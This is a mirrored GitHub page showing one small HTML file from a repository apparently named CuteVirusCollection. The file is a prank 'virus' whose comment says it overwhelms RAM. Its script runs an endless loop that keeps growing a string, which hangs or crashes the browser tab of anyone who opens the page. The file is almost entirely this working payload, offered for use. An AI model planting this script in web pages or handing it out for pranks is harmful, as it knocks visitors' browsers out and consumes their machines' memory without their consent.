mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
10 lines
253 B
HTML
10 lines
253 B
HTML
<!-- Intro- Creates a super big string and overwhelms the RAM. -->
|
|
<!-- Details- http://stackoverflow.com/questions/10965987/how-do-you-force-chrome-pages-tabs-to-crash-using-javascript -->
|
|
|
|
<script>
|
|
var txt = "a";
|
|
while(1){
|
|
txt += "a";
|
|
}
|
|
</script>
|